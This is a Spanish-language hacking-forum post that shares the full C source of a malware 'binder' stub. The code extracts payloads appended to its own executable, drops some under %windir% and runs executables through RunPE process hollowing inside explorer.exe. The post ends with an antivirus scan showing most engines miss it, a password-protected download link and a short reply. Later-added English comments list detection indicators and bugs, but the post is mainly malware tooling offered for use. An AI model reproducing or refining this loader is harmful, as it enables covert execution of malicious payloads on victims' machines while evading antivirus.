¡Hola! Aquí les dejo el primer binder que programé. Tiene ya un tiempo, pero lo probé en varios Windows y funciona: es RunPE y soporta múltiples archivos.
Pueden elegir el método de ejecución. Les dejo algunas imágenes, el código del STUB, el análisis y, por supuesto, el link de descarga.
(http://i58.tinypic.com/dwc7zm.png)
(http://i59.tinypic.com/20h7zwx.png)
(http://i59.tinypic.com/112a6g3.png)
#include <windows.h>
// Function-pointer type for the native API ntdll!NtUnmapViewOfSection, which
// EjecuteMemory resolves at runtime with LoadLibraryA/GetProcAddress.
// (The leading underscore + capital makes this a reserved identifier in C/C++.)
typedef LONG ( __stdcall *_NtUnmapViewOfSection ) ( IN HANDLE pFile, IN PVOID ImageBase );
/*
##########################################################################
# Stub de panda binder 1
# Diseñado y desarrollado por xxneeco83xx
# Para Underc0de.org
#
# Soporta varios archivos
#
# [email protected]
##########################################################################
*/
//Estructura MYFILE
// Per-record metadata for one embedded file (see WinMain). The instance in
// WinMain is a stack variable that is never zero-initialised: extension and
// modex are filled with CopyMemory and no terminator is written, so the
// string functions applied to them rely on whatever follows on the stack.
typedef struct TAGfile {
char extension [ MAX_PATH ]; // 3 bytes copied from the record header (e.g. "exe")
char randomize [ MAX_PATH ]; // drop path "%windir%\<rand><rand>.<ext>", built with wsprintfA
char modex [ MAX_PATH ];     // 1 byte copied from the record header; parsed with atoi
} MYFILE, *LPMYFILE;
// Forward declaration of the process-hollowing loader defined below.
// Ownership caveat: the callee calls GlobalFree(Buffer) on its fall-through
// path, so a caller must not free Buffer again after a successful call.
bool __stdcall EjecuteMemory ( IN LPVOID Buffer, IN LPSTR AppName );
/*
 * EjecuteMemory — 32-bit "RunPE" / process hollowing loader.
 *
 * Starts AppName suspended, unmaps its original image, copies the PE image
 * held in Buffer into the new process at the payload's preferred ImageBase,
 * patches the host's PEB.ImageBaseAddress, points the main thread at the
 * payload entry point and resumes it.
 *
 * Buffer  : in-memory PE file (headers followed by sections at their raw
 *           file offsets). Freed here with GlobalFree on the fall-through
 *           path; WinMain frees the same buffer again after the call, which
 *           is a double free.
 * AppName : path of the host executable to hollow (WinMain passes
 *           %windir%\explorer.exe).
 * Returns : false only when NtUnmapViewOfSection cannot be resolved or the
 *           host's image base differs from the payload's preferred base.
 *           Every other outcome — not a PE, CreateProcessA, GetThreadContext
 *           or VirtualAllocEx failing — falls through and returns TRUE, so
 *           TRUE does not mean the payload ran.
 *
 * x86-only: uses CONTEXT.Ebx/Eax, 32-bit pointer arithmetic and the
 * IMAGE_NT_HEADERS32 layout (248-byte header, 40-byte section entries).
 * No relocation processing, no error cleanup: on every failure path the
 * suspended host process is left alive and its handles are never closed.
 *
 * Detection (defender's view): the observable call sequence is
 * CreateProcessA(CREATE_SUSPENDED) -> NtUnmapViewOfSection ->
 * VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory x N ->
 * SetThreadContext -> ResumeThread against a child explorer.exe.
 */
bool __stdcall EjecuteMemory ( IN LPVOID Buffer, IN LPSTR AppName ) {
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INTH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
PCONTEXT CTX;
PDWORD dwImageBase; // receives the host's 4-byte PEB.ImageBaseAddress
LPVOID pImageBase;  // remote address of the payload image inside the host
int Count = 0;
// Resolve the native API at runtime (it is not reachable through windows.h).
_NtUnmapViewOfSection NtUnmapViewOfSection = ( _NtUnmapViewOfSection ) GetProcAddress ( ( HINSTANCE ) LoadLibraryA ( "NTDLL.DLL"), "NtUnmapViewOfSection" );
if ( NtUnmapViewOfSection == 0L )
{
return false;
}
// Validate the in-memory payload: "MZ" signature, then "PE\0\0" at e_lfanew.
IDH = PIMAGE_DOS_HEADER ( Buffer );
if ( IDH->e_magic == IMAGE_DOS_SIGNATURE )
{
INTH = PIMAGE_NT_HEADERS ( DWORD ( Buffer ) + IDH->e_lfanew );
if ( INTH->Signature == IMAGE_NT_SIGNATURE ) {
RtlZeroMemory ( &SI, sizeof ( SI ) );
RtlZeroMemory ( &PI, sizeof ( PI ) );
// Create the host suspended so its main thread has not executed yet.
if ( CreateProcessA ( AppName, 0L, 0L, 0L, false, CREATE_SUSPENDED, 0, 0, &SI, &PI ) )
{
// NOTE: sizeof ( CTX ) is the size of the PCONTEXT pointer, not of CONTEXT;
// this only works because VirtualAlloc commits whole pages. The block is
// never released with VirtualFree.
CTX = PCONTEXT ( VirtualAlloc ( 0L, sizeof ( CTX ), MEM_COMMIT, PAGE_READWRITE ) );
CTX->ContextFlags = CONTEXT_FULL;
if ( GetThreadContext ( PI.hThread, LPCONTEXT ( CTX ) ) ) {
// In the initial context of a new 32-bit process EBX holds the PEB pointer;
// PEB + 8 is ImageBaseAddress. The ReadProcessMemory result is unchecked.
ReadProcessMemory ( PI.hProcess, LPCVOID ( CTX->Ebx + 8), LPVOID ( &dwImageBase ), 4, 0L );
// Proceed only if the host is mapped at the payload's preferred base.
if ( DWORD ( dwImageBase ) == INTH->OptionalHeader.ImageBase )
{
// Remove the host's original image from its own address space.
NtUnmapViewOfSection ( PI.hProcess, PVOID ( dwImageBase ) );
}
else
{
// Returns with the suspended host still alive; Buffer is not freed on this path.
return false;
}
// 0x3000 == MEM_COMMIT | MEM_RESERVE. Requests RWX at exactly the preferred
// base — there is no relocation handling if this address is unavailable.
pImageBase = VirtualAllocEx ( PI.hProcess, LPVOID ( INTH->OptionalHeader.ImageBase ), INTH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE );
if ( pImageBase ) {
// Copy the headers, then each section's raw data to its virtual address.
WriteProcessMemory ( PI.hProcess, pImageBase, Buffer, INTH->OptionalHeader.SizeOfHeaders, 0 );
for ( Count; Count < INTH->FileHeader.NumberOfSections; Count ++ )
{
// Walks the section table by hand: 248 == sizeof(IMAGE_NT_HEADERS32),
// 40 == sizeof(IMAGE_SECTION_HEADER).
ISH = PIMAGE_SECTION_HEADER ( DWORD ( Buffer ) + IDH->e_lfanew + 248 + ( Count * 40 ) );
WriteProcessMemory ( PI.hProcess, LPVOID ( (DWORD ( pImageBase ) + ISH->VirtualAddress ) ), LPVOID ( ( DWORD ( Buffer ) + ISH->PointerToRawData ) ), ISH->SizeOfRawData, 0 );
}
// Point the host's PEB.ImageBaseAddress at the payload image.
WriteProcessMemory ( PI.hProcess, LPVOID ( CTX->Ebx + 8 ), LPVOID ( &INTH->OptionalHeader.ImageBase ), 4, 0 );
// In the initial x86 context EAX is the thread start address; redirect it
// to the payload's entry point, apply the context and let the host run.
CTX->Eax = DWORD ( pImageBase ) + INTH->OptionalHeader.AddressOfEntryPoint;
SetThreadContext ( PI.hThread, LPCONTEXT ( CTX ) );
ResumeThread ( PI.hThread );
}
// If VirtualAllocEx failed the host stays suspended; nothing terminates it.
}
}
}
}
// Frees the caller's buffer; WinMain frees the same pointer again afterwards.
GlobalFree ( Buffer );
// Reached even when the checks above failed.
return TRUE;
}
/*
 * WinMain — entry point of the binder stub.
 *
 * Reads its own executable from disk, locates the "cote" marker that
 * separates the stub from the appended container, then walks records that
 * each begin with the literal "*new*":
 *
 *   "*new*" <3-char extension> <1-char mode digit> <payload bytes ...>
 *   "*new*fin"                                     -> end of container
 *
 * Records whose extension is not "exe"/"EXE" are written to
 * %windir%\<rand><rand>.<ext> and left there (this loop never launches
 * them). "exe" records with valid MZ and PE signatures are run through
 * EjecuteMemory (hollowing into %windir%\explorer.exe) when mode is 0 or 1;
 * other modes, and MZ-without-PE, do nothing. "exe" records with no MZ
 * signature go to CreateProcessA on file.randomize, a path that this branch
 * never writes to disk (the only CreateFileA on it is in the non-exe branch).
 *
 * The WinMain parameters are unused (the last one is a misspelled nCmdShow).
 * Returns EXIT_FAILURE if the stub cannot open itself or a drop file,
 * EXIT_SUCCESS after the scan, or terminates via ExitProcess(0) at "fin".
 *
 * Indicators (defender's view): the byte strings "cote", "*new*" and
 * "*new*fin"; a self-read of GetModuleFileNameA(NULL); file creation under
 * %windir% with purely numeric random names; a suspended explorer.exe child.
 *
 * Memory-safety notes, left as-is: the "cote", "*new*" and "*new*" scans use
 * "<= dwSize" and compare up to 7 bytes beyond the index, past the
 * dwSize + 1 allocation; StubBuffer is advanced in place and the advanced
 * pointer is what GlobalFree later receives; Temp is freed at "fin" before
 * it has necessarily been allocated; size is read uninitialised when no
 * closing "*new*" follows a record; the trim loop reads up to 4 bytes past
 * Temp; and Temp is freed both inside EjecuteMemory and here. e, d's
 * sibling number_files, and Path are declared but never used.
 */
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFunstil ) {
// Locals (the original comment called them globals).
HANDLE File;
DWORD dwSize, dwBytes, a, b, c, e, d, number_files, mode, size;
// PE headers of the current record.
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INTH;
// Structures for CreateProcessA.
STARTUPINFOA stinfo;
PROCESS_INFORMATION pi;
// Per-record metadata; never zero-initialised.
MYFILE file;
// String pointers. Temp and size are first assigned inside the loop.
LPSTR Temp, Path, StubBuffer, AppName;
// Seed rand() (used for drop-file names) and zero the CreateProcessA structures.
srand ( GetTickCount () ); // seed the random generator
ZeroMemory ( &stinfo, sizeof ( stinfo ) );
ZeroMemory ( &pi, sizeof ( pi ) );
// Our own path. 0x0000 | 0x0040 == GMEM_FIXED | GMEM_ZEROINIT (GPTR).
AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );
// Open our own image for reading.
File = CreateFileA ( AppName, GENERIC_READ, FILE_SHARE_READ, 0
, OPEN_EXISTING, 0, 0 );
if ( ( File == INVALID_HANDLE_VALUE ) || ( File == 0L ) ) {
// CloseHandle is called on an invalid handle here.
CloseHandle ( File );
GlobalFree ( AppName );
return EXIT_FAILURE;
}
// Our size on disk.
dwSize = GetFileSize ( File, 0 );
// Read the whole image into StubBuffer; allocation and ReadFile results are unchecked.
StubBuffer = PCHAR ( GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSize + 1 ) ) );
ReadFile ( File, StubBuffer, dwSize, &dwBytes, 0 );
CloseHandle ( File );
// Release our path string.
GlobalFree ( AppName );
for ( a = 0; a <= dwSize; a ++ ) {
// Find the "cote" marker that starts the appended container.
if ( ( StubBuffer [ a ] == 'c' ) && ( StubBuffer [ a + 1 ] == 'o' ) && ( StubBuffer [ a + 2 ] == 't' ) &&
( StubBuffer [ a + 3 ] == 'e' ) ) {
// Move the buffer pointer past the marker; the allocation base is lost.
StubBuffer += ( a + 4 );
dwSize -= ( a + 4 );
/* Adjust the size to the new buffer and set up the new buffer */
break;
}
}
for ( b = 0; b <= dwSize; b ++ ) {
// Look for a record marker.
if ( ( StubBuffer [ b ] == '*' ) && ( StubBuffer [ b + 1 ] == 'n' ) && ( StubBuffer [ b + 2 ] == 'e' ) &&
( StubBuffer [ b + 3 ] == 'w' ) && ( StubBuffer [ b + 4 ] == '*' ) ) {
// "*new*fin" terminates the container. Temp may not have been allocated yet.
if ( ( StubBuffer [ b + 5 ] == 'f' ) && ( StubBuffer [ b + 6 ] == 'i' ) && ( StubBuffer [ b + 7 ] == 'n' ) ) {
GlobalFree ( Temp );
GlobalFree ( StubBuffer );
ExitProcess ( 0 );
}
// 3-byte extension and 1-byte mode digit, copied without terminators.
CopyMemory ( & file.extension [ 0 ], & StubBuffer [ b + 5 ], 3 );
CopyMemory ( & file.modex [ 0 ], & StubBuffer [ b + 8 ], 1 );
// Execution mode; atoi keeps reading modex past the single copied byte.
mode = atoi ( file.modex );
// Find the next record marker to delimit this payload.
for ( c = b + 9; c <= dwSize; c ++ ) {
// size becomes an absolute offset (c - 1), not a length; unchanged if no marker follows.
if ( ( StubBuffer [ c ] == '*' ) && ( StubBuffer [ c + 1 ] == 'n' ) && ( StubBuffer [ c + 2 ] == 'e' ) &&
( StubBuffer [ c + 3 ] == 'w' ) && ( StubBuffer [ c + 4 ] == '*' ) ) {
size = ( c - 1 );
break;
}
}
// Hollowing host: %windir%\explorer.exe (getenv result unchecked).
char explorer [ MAX_PATH + 1 ];
wsprintfA ( explorer, "%s\\explorer.exe", getenv ( "windir" ) );
// Drop path: %windir%\<rand % screen width><rand % screen height>.<ext>.
wsprintfA ( file.randomize, "%s\\%d%d.%s", getenv ( "windir" ), rand () % GetSystemMetrics ( SM_CXSCREEN ), rand () % GetSystemMetrics ( SM_CYSCREEN ), file.extension );
// Copy the record: size + 1 == c bytes allocated and c bytes copied from
// b + 9, so the copy reads beyond this record's end in StubBuffer.
Temp = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( size + 1 ) );
CopyMemory ( & Temp [ 0 ], & StubBuffer [ b + 9 ], c );
// Scan Temp backwards from index orig for the copied "*new*" marker and trim
// size to the bytes before it. NOTE(review): the arithmetic mixes absolute
// offsets (b, c) with lengths — verify the resulting size against the layout.
int orig = size;
for ( d = 0; d <= orig; d ++ ) {
if ( ( Temp [ orig - d ] == '*' ) && ( Temp [ orig - ( d - 1 ) ] == 'n' ) &&
( Temp [ orig - ( d - 2 ) ] == 'e' ) && ( Temp [ orig - ( d - 3 ) ] == 'w' ) && ( Temp [ orig - ( d - 4 ) ] == '*' ) ) {
// Readjust the record size.
size -= ( d - 1 );
break;
}
}
// Interpret the record as a PE (only meaningful if it really is one).
IDH = PIMAGE_DOS_HEADER ( Temp );
INTH = PIMAGE_NT_HEADERS ( DWORD ( Temp ) + IDH -> e_lfanew );
// Non-exe records are written to disk under %windir% and not launched.
if ( lstrcmpA ( file.extension, "exe" ) != 0 && lstrcmpA ( file.extension, "EXE" ) != 0 )
{
File = CreateFileA ( file.randomize, GENERIC_WRITE, FILE_SHARE_WRITE, 0,
CREATE_ALWAYS, 0, 0 );
if ( ( File == INVALID_HANDLE_VALUE ) || ( File == 0L ) ) {
// Temp is leaked on this path; StubBuffer is an advanced pointer.
CloseHandle ( File );
GlobalFree ( StubBuffer );
return EXIT_FAILURE;
}
WriteFile ( File, Temp, size, &dwBytes, 0 );
CloseHandle ( File );
}
else
{
// exe records: hollow explorer.exe when MZ and PE match and mode is 0 or 1.
if ( ( IDH -> e_magic == IMAGE_DOS_SIGNATURE ) )
{
if ( ( INTH -> Signature == IMAGE_NT_SIGNATURE ) )
{
if ( mode == 0 || mode == 1 )
{
// Return value ignored; EjecuteMemory frees Temp when it runs to completion.
EjecuteMemory ( Temp, explorer );
}
}
}
else
{
// exe extension without an MZ header: CreateProcessA on the drop path,
// which this branch never wrote. Mode 0 selects CREATE_NO_WINDOW.
if ( mode == 0 )
{
CreateProcessA ( file.randomize, 0, 0, 0, false, CREATE_NO_WINDOW, 0, 0, &stinfo, & pi );
}
else
{
CreateProcessA ( file.randomize, 0, 0, 0, false, CREATE_DEFAULT_ERROR_MODE, 0, 0, &stinfo, & pi );
}
/* If the file is not in PE (Portable Executable) format, run it with CreateProcessA */
}
}
// Free the record buffer so it can be reused on the next iteration
// (double free when EjecuteMemory already released it).
GlobalFree ( Temp );
// Advance the container pointer; the b loop keeps its current index.
StubBuffer += ( size );
}
}
// Once all records are processed, free the main buffer — StubBuffer no
// longer points at the allocation base.
GlobalFree ( StubBuffer );
return EXIT_SUCCESS;
}
http://r.virscan.org/report/26672cefa3d6385da0228a5d90f9bdae (http://r.virscan.org/report/26672cefa3d6385da0228a5d90f9bdae)
Scanner Engine Ver Sig Ver Sig Date Scan result Time
ahnlab 9.9.9 9.9.9 2013-05-28 Found nothing 4
antivir 1.9.2.0 1.9.159.0 7.11.253.84 Found nothing 43
antiy AVL SDK 3.0 2014112615531100 2014-11-26 Found nothing 1
arcavir 1.0 2011 2014-05-30 Found nothing 25
asquared 9.0.0.4157 9.0.0.4157 2014-07-30 Found nothing 2
avast 150804-0 4.7.4 2015-08-04 Found nothing 56
avg 2109/8526 10.0.1405 2015-01-30 Found nothing 1
baidu 2.0.1.0 4.1.3.52192 2.0.1.0 Found nothing 4
baidusd 1.0 1.0 2014-04-02 Found nothing 1
bitdefender 7.58879 7.90123 2015-01-16 Found nothing 1
clamav 20760 0.97.5 2015-08-03 PUA.Win32.Packer.MingwGcc-2 1
comodo 15023 5.1 2015-08-01 Found nothing 3
ctch 4.6.5 5.3.14 2013-12-01 Found nothing 1
drweb 5.0.2.3300 5.0.1.1 2015-08-03 Found nothing 58
fortinet 27.158, 27.158 5.1.158 2015-08-04 Found nothing 1
fprot 4.6.2.117 6.5.1.5418 2015-08-04 W32/Felix:VC_program!Eldorado 4
fsecure 2015-08-01-02 9.13 2015-08-01 Found nothing 6
gdata 24.3819 24.3819 2014-08-29 Found nothing 7
hauri 2.73 2.73 2015-01-30 Found nothing 1
ikarus 1.06.01 V1.32.31.0 2015-08-04 Trojan.Win32.Agents 37
jiangmin 16.0.100 1.0.0.0 2015-07-30 Found nothing 21
kaspersky 5.5.33 5.5.33 2014-04-01 Found nothing 54
kingsoft 2.1 2.1 2013-09-22 Found nothing 4
mcafee 7879 5400.1158 2015-07-31 Found nothing 21
nod32 1777 3.0.21 2015-06-12 Found nothing 1
panda 9.05.01 9.05.01 2014-06-15 Found nothing 5
pcc 11.832.02 9.500-1005 2015-08-04 Found nothing 3
qh360 1.0.1 1.0.1 1.0.1 Found nothing 6
qqphone 1.0.0.0 1.0.0.0 2015-08-05 Found nothing 4
quickheal 14.00 14.00 2014-06-14 Found nothing 2
rising 25.17.00.04 25.17.00.04 2014-06-02 Found nothing 5
sophos 5.17 3.60.0 2015-08-01 Found nothing 20
sunbelt 3.9.2589.2 3.9.2589.2 2014-06-13 Found nothing 2
symantec 20150802.002 1.3.0.24 2015-08-02 Found nothing 1
tachyon 9.9.9 9.9.9 2013-12-27 Found nothing 3
thehacker 6.8.0.5 6.8.0.5 2014-06-12 Trojan/Ainslot.aa 1
tws 17.47.17308 1.0.2.2108 2014-06-16 Suspicious:Heuri.NewThreat.MVM 6
vba 3.12.26.4 3.12.26.4 2015-08-03 Found nothing 10
virusbuster 15.0.985.0 5.5.2.13 2014-12-05 Found nothing 42
Aquí el link de descarga
https://mega.nz/#!upwFTDbC!Lunv4WULb0N9MdcBP9X-wpfXl9qLtIWS3t1RwGVehVY (https://mega.nz/#!upwFTDbC!Lunv4WULb0N9MdcBP9X-wpfXl9qLtIWS3t1RwGVehVY)
PASS : xxneeco83xx
Gracias por el aporte, amigo.
salut